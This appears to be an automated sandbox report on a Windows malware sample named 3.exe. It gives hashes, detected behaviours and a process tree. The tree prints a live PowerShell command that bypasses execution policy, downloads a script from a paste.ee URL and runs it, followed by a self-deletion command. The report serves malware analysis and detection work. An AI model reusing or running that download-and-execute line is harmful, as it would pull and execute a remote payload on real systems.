Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-09-2024 16:16
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
2.exe
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
2.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
3.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
3.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
4.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
4.exe
Resource
win10v2004-20240802-en
General
-
Target
3.exe
-
Size
1.2MB
-
MD5
6f58eada2611d4e69798d3824ab1ed28
-
SHA1
76f0495c12cb7884fc406b1ef7de946230a1f499
-
SHA256
0a7fded88420aedebccb96a4cacd197d5b29b60746e8c3a423cb0f78f3674f5c
-
SHA512
a32df7e7cb123ab1f9d4649e8c6b5b039346de1879398c5a68e6ca5d7d8c5a408e8b2ac72d68c46ca7ad9660ca08a9503ba31f7817b954f056a26fe5fb1b4f5d
-
SSDEEP
24576:Qrfl+F1DI+oc6owGiOV8DABNUS+m+++oJee++oAYLbmtjjjjDjjpmbiDcA:6t+F1DI+96iiOaDkNUS+m+++oJee++oC
Malware Config
Signatures
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2668 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
3.exepowershell.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
3.exepowershell.exepid process 2980 3.exe 2980 3.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
3.exedescription pid process target process PID 2980 wrote to memory of 2652 2980 3.exe powershell.exe PID 2980 wrote to memory of 2652 2980 3.exe powershell.exe PID 2980 wrote to memory of 2652 2980 3.exe powershell.exe PID 2980 wrote to memory of 2652 2980 3.exe powershell.exe PID 2980 wrote to memory of 2668 2980 3.exe cmd.exe PID 2980 wrote to memory of 2668 2980 3.exe cmd.exe PID 2980 wrote to memory of 2668 2980 3.exe cmd.exe PID 2980 wrote to memory of 2668 2980 3.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652 -
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2668